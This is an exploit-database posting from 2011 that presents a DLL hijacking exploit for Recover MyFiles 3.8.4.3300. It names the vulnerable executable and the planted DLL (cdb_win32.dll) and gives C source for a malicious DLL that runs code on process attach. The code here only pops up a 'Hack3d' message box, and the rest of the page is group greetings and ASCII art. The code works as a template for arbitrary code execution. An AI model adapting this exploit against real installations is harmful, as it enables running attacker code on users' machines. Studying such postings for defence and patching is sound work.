[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Recover MyFiles 3.8.4.3300 DLL Hijacking Exploit

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16779
Category
local exploits
Date add
27-08-2011
Platform
windows
===============================================
Recover MyFiles 3.8.4.3300 DLL Hijacking Exploit 
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0     _   ____   ____   _____   __   _____  __    __  1
1   _| | |__  | |__  | |___  | |  | |  _  | \ \  / /  0
0  |_  |  __| |   _| |    / /  |  | | |_| |  \ \/ /   1
1    | | |__  |  |__ |   / / __|  | |  _  |   /  /    0
0    | |  __| |  __| |  / / /  _  | | | | |  /  /     1
1    |_| |____| |____| /_/ /  [_] | | | | | /  /      0
0        Site:1337day.com /_______| |_| |_|/__/       1
1     Support e-mail  : submit[at]inj3ct0r.com        0                                      
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

           # Vendor: http://www.softpedia.com/

                 # Date: 2011-07-27 

                # Author : indoushka 

            +++=[ Dz Offenders Cr3w ]=+++

         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 

           # Contact : ind0ushka@hotmail.com

     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
RecoverMyFiles.exe

cdb_win32.dll

-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-11-16]  #